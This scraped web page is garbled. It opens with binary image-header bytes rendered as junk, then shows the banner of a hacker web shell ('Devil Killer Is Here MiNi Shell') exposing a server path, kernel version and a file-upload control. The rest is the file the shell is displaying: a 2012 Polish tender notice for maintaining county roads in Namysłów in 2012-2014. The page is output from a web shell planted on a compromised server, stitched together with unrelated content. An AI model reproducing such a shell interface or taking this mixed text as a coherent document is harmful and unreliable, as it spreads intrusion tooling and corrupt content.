JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120222/42971-N-2012.html

<p class="kh_header"><b>Namysłów: Bieżące utrzymanie dróg powiatowych na terenie powiatu namysłowskiego w latach 2012-2014.</b><br>
<b>Numer ogłoszenia: 42971 - 2012; data zamieszczenia: 22.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Namysłowski reprezentowany przez Zarząd Powiatu , Pl. Wolności 12A, 46-100 Namysłów, woj. opolskie, tel. (077) 410 36 95, faks 077 4103922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.namyslow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg powiatowych na terenie powiatu namysłowskiego w latach 2012-2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest bieżące utrzymanie dróg na terenie powiatu namysłowskiego w latach 2012-2014. Zakres przedmiotu zamówienia obejmuje poszczególne prace zawarte w załączniku do formularza oferty o nazwie Cennik - Bieżące utrzymanie dróg.
Wspólny Słownik Zamówień (CPV): 
Główny przedmiot: 45.23.31.40-2 (Roboty drogowe). 
Przedmioty dodatkowe: 45.11.21.00-6 (Roboty w zakresie kopania rowów), 45.23.31.41-9 (Roboty w zakresie konserwacji dróg), 45.23.31.42-6 (Roboty w zakresie naprawy dróg), 45.23.32.00-1 (Roboty w zakresie różnych nawierzchni), 45.23.32.20-7 (Roboty w zakresie nawierzchni dróg), 45.23.32.21-4 (Malowanie nawierzchni), 45.23.32.22-1 (Roboty budowlane w zakresie układania chodników i asfaltowania), 45.23.32.53-7 (Roboty w zakresie nawierzchni dróg dla pieszych), 45.23.32.90-8 (Instalowanie znaków drogowych), 45.23.32.92-2 (Instalowanie urządzeń drogowych).
Uwaga: 
Elementy robót nie ujęte w cenniku, a zgłoszone do realizacji przez Zamawiającego wynikłe w czasie robót bieżącego utrzymania, będą rozliczane według obowiązujących zasad kosztorysowania w oparciu o obmiar powykonawczy, nakłady z KNR, średnią cenę pracy sprzętu i średnią cenę materiałów z SEKOCENBUD dla województwa opolskiego jak dla robót inżynieryjnych i instalacji sanitarnych, z zastosowaniem składników cenotwórczych (R - brutto, Kp, Kz, Z). 
W ramach bieżącego utrzymania dróg Wykonawca prowadzi działania interwencyjne. Wykonawca zobowiązuje się zdobyć informacje konieczne do właściwego wykonywania zamówienia. 
Wymagania jakościowe: 
W/w prace należy wykonać zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.), rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. z 1999 r. Nr 43 poz. 430 z późn. zm.) z zastosowaniem wyrobów budowlanych zgodnych z ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2004 r. Nr 92, poz. 881 z późn. zm.), specyfikacjami technicznymi, sztuką budowlaną, wszelkimi niezbędnymi przepisami, obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy - w tym dla użytkowników dróg, stosując wyroby budowlane posiadające stosowne aprobaty techniczne. 
Warunki realizacyjne: 
Kwota przeznaczona na realizację przedmiotu zamówienia będzie ustalana corocznie w oparciu o wysokość środków budżetowych, uchwalanych przez radę powiatu.
W ramach bieżącego utrzymania dróg Wykonawca zobowiązany jest do:
- prowadzenia działań interwencyjnych, 
- zdobywania informacji koniecznych do właściwego wykonania zamówienia,
- zapewnienia komunikacji samochodowej i pieszej w obrębie miejsca prowadzenia robót dla uczestników ruchu i dla obsługi obiektów przylegających, 
- oznakowania i zabezpieczania terenu robót przed przystąpieniem do ich realizacji  oraz utrzymywania oznakowanie i zabezpieczenia terenu przez cały czas trwania robót (zabezpieczenia terenu budowy na własny koszt ujęty w cenach jednostkowych),
- dostarczenia, zainstalowania i obsługi wszystkich tymczasowych urządzeń zabezpieczających tj.: zapory, znaki, światła ostrzegawcze, sygnały i inne na czas wykonywania robót, zapewniając w ten sposób bezpieczeństwo użytkowników drogi i obiektów przylegających, 
- wykonywania robót zgodnie z zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy w tym dla użytkowniku dróg i obiektów (posiadania wiedzy i stosowania jej w czasie prowadzenia prac stosowania wszelkich przepisów dotyczących obowiązujących warunków technicznych wykonania i odbioru robót oraz obowiązujących norm technicznych), 
- stosowania materiałów posiadających atesty techniczne lub aprobatę świadczące o ich jakości zgodnie z wymogami norm i dopuszczenia do ich wbudowania wg wymogów obowiązującego Prawa Budowlanego oraz uzyskania potwierdzenie Zamawiającego na jego wbudowanie, 
- dostarczenia atestów i aprobat przed wbudowaniem, 
- przeprowadzania w trakcie budowy stosownych badań laboratoryjnych dokumentujących zachowanie prawidłowego procesu technologicznego, 
- zagęszczenia podłoża pod powierzchnię drogową do wskaźnika 1.0,
- ponoszenia odpowiedzialności za ochronę instalacji urządzeń podziemnych zlokalizowanych na terenie prowadzonych robót na powierzchni ziemi, typu: zawory, studnie, hydranty, a o fakcie przypadkowego uszkodzenia tych instalacji bezzwłocznego powiadamiania Zamawiającego i zainteresowanego eksploatatora tych urządzeń oraz współpracy z nimi polegającej na dostarczeniu wszelkiej pomocy potrzebnej przy dokonaniu naprawy, 
- składania materiałów rozbiórkowych nadających się do ponownego wbudowania na wskazanym przez Zamawiającego miejscu,
- przestrzegania przepisów dotyczących bezpieczeństwa i ochrony pracy podczas realizacji robót,
- zapewnienia i utrzymywania urządzeń zabezpieczających, socjalnych oraz sprzętu do ochrony życia i zdrowia osób zatrudnionych na budowie oraz dla zapewnienia bezpieczeństwa publicznego,
- odpowiedzialności za ochronę robót i za wszelkie materiały i urządzenia używane do robót od daty rozpoczęcia do daty ich zakończenia, 
- ponoszenia wszystkich kosztów związanych z dostarczeniem materiałów, wywozem gruzu, nadmiaru ziemi z urobku i innych kosztów uwzględniając je w cenach jednostkowych, 
- używania do wykonywania przedmiotu umowy jedynie takiego sprzętu i środków transportowych, które nie spowodują niekorzystnego wpływu na jakość prowadzonych robót (sprzęt i środki transportu będący własnością Wykonawcy lub będące w posiadaniu do wykonania robót ma być utrzymywany w dobrym stanie i gotowości do pracy oraz winien być oznakowany w logo firmy), 
- przestrzegania wymagań i przepisów ruchu drogowego dotyczących dopuszczalnych obciążeń na osie i innych parametrów technicznych w stosunku do poruszających się pojazdów Wykonawcy po drogach publicznych, 
- usuwania na bieżąco na własny koszt wszelkich zanieczyszczeń lub zniszczeń spowodowanych pojazdami Wykonawcy na drogach publicznych, 
- zgłaszania zakończenia realizacji robót na powierzonym odcinku drogi (po ich wykonaniu) do Zamawiającego  w celu spisania protokołu odbioru robót w terenie, zabezpieczając jednocześnie swój środek transportowy, w celu odbioru wykonanych robót, 
- zabezpieczenia swojego środka transportowego w celu dokonania wizji dróg i ustalenia zakresu robót  niezbędnych do realizacji, usunięcia awarii, zdarzeń losowych oraz wiosennych i okresowych przeglądów dróg i obiektów mostowych a także robót zgłoszonych do odbioru (koszty środka transportowego należy uwzględnić w cenach jednostkowych),
- ochrony przed uszkodzeniem lub zniszczeniem własności publicznej lub prywatnej. (jeżeli w związku z zaniedbaniem, niewłaściwym prowadzeniem robót lub brakiem koniecznych działań ze strony Wykonawcy nastąpi uszkodzenie lub zniszczenie własności publicznej lub prywatnej, to Wykonawca na swój koszt naprawi lub odtworzy uszkodzoną własność. Stan naprawionej własności powinien być nie gorszy niż przed powstaniem uszkodzenia), 
- ubezpieczenia się od ryzyk budowlanych i montażowych, od odpowiedzialności cywilnej za ewentualne szkody i następstwa nieszczęśliwych wypadków, dotyczące pracowników Wykonawcy, innych osób, z pomocą których Wykonawca wykonuje przedmiot umowy oraz osób trzecich, w tym także wynikające z ruchu pojazdów mechanicznych, powstałe w trakcie prowadzonych prac,
- ponoszenia odpowiedzialności i wszelkich kosztów z tytułu strat materialnych powstałych w związku z zaistnieniem zdarzeń losowych i z tytułu odpowiedzialności cywilnej za szkody oraz następstwa nieszczęśliwych wypadków dot. pracowników, osób trzecich, użytkowników dróg i obiektów będących przedmiotem niniejszej umowy - powstałe w związku z wykonywaniem przedmiotu umowy,
- bezzwłocznego informowania Zamawiającego o wszelkich przeszkodach uniemożliwiających i utrudniających wykonanie zadania,
- dysponowania osobami zdolnymi do wykonywania przedmiotu umowy oraz do zabezpieczenia odpowiedniego sprzętu i materiałów do wykonywania przedmiotu umowy w terminie ustalonym przez Zamawiającego,
- zabezpieczenia sprzętu wraz z operatorami (kierowcami) posiadającymi stosowne kwalifikacje gwarantującego prawidłowe wykonywanie  przedmiotu umowy,
- wywożenia z terenu robót gruzu rozbiórkowego na odkład, nadmiaru ziemi z urobku i innych zbędnych materiałów zgodnie z przepisami o ochronie środowiska naturalnego,
- bezpośredniego usuwania wszelkich zanieczyszczeń lub zniszczeń spowodowanych jego maszynami, narzędziami, urządzeniami i środkami transportu na drogach publicznych,
Uznaje się, że wszelkie koszty związane z wypełnieniem wymagań określonych w przedmiocie zamówienia nie podlegają odrębnej zapłacie i są uwzględnione w cenach jednostkowych jakie zaproponuje Wykonawca.
Nie dopuszcza się składania ofert częściowych.                                                                
Miejsce realizacji zamówienia: drogi powiatowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.21.00-6, 45.23.31.41-9, 45.23.31.42-6, 45.23.32.00-1, 45.23.32.20-7, 45.23.32.21-4, 45.23.32.22-1, 45.23.32.53-7, 45.23.32.90-8, 45.23.32.92-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 30.000, 00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, że Wykonawca spełnia warunek posiadania odpowiednich uprawnień do wykonywania określonej działalności lub czynności, jeżeli przedstawi uprawnienia w zakresie:                      - kierowania robotami budowlanymi w specjalności drogowej  (uprawnienia wraz z aktualnym zaświadczeniem o przynależności do OIIB), 
- obsługi niezbędnych do wykonania zamówienia maszyn, narzędzi, urządzeń i środków transportu niezbędnych do wykonywania przedmiotu zamówienia (walca drogowego do 10t., koparko-ładowarki, remontera drogowego (Patcher), sprężarki powietrznej przewoźnej, samochodu samowyładowczego, samochodu skrzyniowego, piły do cięcia mas bitumicznych i kostki betonowej, młota wyburzeniowego, płyty wibracyjnej, termosu do przewozu mieszanki bitumicznej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę związaną z remontem (wykonanie) nawierzchni bitumicznej, nawierzchni z kostki brukowej betonowej i z kostki kamiennej, z  podaniem ich rodzaju i wartości, daty i miejsca wykonania, oraz załączy dokument potwierdzający, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, że wykonawca spełnia warunek posiadania odpowiedniego potencjału technicznego, jeżeli wykaże, że dysponuje (własność, najem, dzierżawa i inne) m.in. walcem statycznym z wibracją do 10t, równiarką samojezdną, koparko-ładowarką, remonterem drogowym (Patcher), sprężarką powietrzną przewoźną, samochodem samowyładowczym, samochodem skrzyniowym, piłą do cięcia mas bitumicznych i kostki betonowej, młotem wyburzeniowym, płytą wibracyjną. Z czego na własność wykonawca musi posiadać: koparko-ładowarkę, remonter drogowy (Patcher), piłę do cięcia mas bitumicznych i kostki betonowej, młot wyburzeniowy, płytę wibracyjna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia, jeżeli wykaże, że dysponuje m.in. jedną osobą do nadzorowania prac, która musi wykazać się doświadczeniem w nadzorowaniu prac związanych z budową dróg oraz min. 5 osobami do bezpośredniej realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia jeżeli przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500.000,00 zł oraz złoży oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony formularz oferty,
2)uprawnienia w zakresie: kierowania robotami budowlanymi w specjalności drogowej  (uprawnienia wraz z aktualnym zaświadczeniem o przynależności do OIIB), obsługi niezbędnych do wykonania zamówienia maszyn, narzędzi, urządzeń i środków transportu niezbędnych do wykonywania przedmiotu zamówienia (walca drogowego do 10t, koparko-ładowarki, remontera drogowego (Patcher), sprężarki powietrznej przewoźnej, samochodu samowyładowczego, samochodu skrzyniowego, piły do cięcia mas bitumicznych i kostki betonowej, młota wyburzeniowego, płyty wibracyjnej, termosu do przewozu mieszanki bitumicznej),
3)cennik - bieżące utrzymanie dróg,
4)dowód wniesienia wadium,
5)pełnomocnictwo - w przypadku, gdy wykonawcę reprezentuje pełnomocnik, posiadające zakres i podpisane przez osoby reprezentujące wykonawcę*.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W następujących przypadkach:
-przedłużającej się procedury wyboru najkorzystniejszej oferty dopuszcza się przesunięcie terminu realizacji przedmiotu zamówienia,
-złożenia odwołania dopuszcza się przesunięcie terminu realizacji przedmiotu zamówienia,
-jeżeli zmiana jest konieczna z przyczyn losowych uniemożliwiających realizację zamówienia w zakładanym terminie,
-jeżeli zmiana jest konieczna z powodu działania siły wyższej tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było uniknąć w szczególności niesprzyjających warunków atmosferycznych i klęsk żywiołowych, uniemożliwiających terminowe wykonanie przedmiotu umowy,
-zmiany stawki podatku VAT, zmianie ulegną ceny jednostkowe brutto o wartość podatku VAT, 
-jeżeli zmiany będą następstwem działania organów sądowych lub administracyjnych, w szczególności dotyczących:
--przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji , zezwoleń itp.,
--odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
--konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu administracyjnego, którego konieczności nie przewidziano przy zawieraniu umowy,
--konieczności zaspokojenia roszczeń osób trzecich - w tym grup społecznych lub zawodowych nie  artykułowanych lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy.
-pojawienia się na rynku nowych materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy dopuszcza się zmianę technologii wykonania przedmiotu umowy,
-niedostępności  na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji technicznej spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń dopuszcza się zmianę technologii wykonania przedmiotu umowy,
-konieczności  zrealizowania  przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych /technologicznych niż wskazane w ofercie lub dokumentacji technicznej w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
-konieczności  zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
-konieczności wykonania robót zamiennych w miejsce robót, które są ujęte w ofercie, a okazały się zbędne i nie wpływają na pogorszenie wykonania przedmiotu umowy, 
-zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, 
-zmiana zasad dokonywania odbiorów  robót budowlanych jeżeli nie  zmniejszy to zasad bezpieczeństwa i nie spowoduje zwiększenia kosztów odbiorów, które obciążałyby Zamawiającego,
-Zmiana terminów płatności wynikająca z wszelkich zmian wprowadzanych przez strony do umowy.
-siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze SIWZ i ofertą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.namyslow.pl<br>
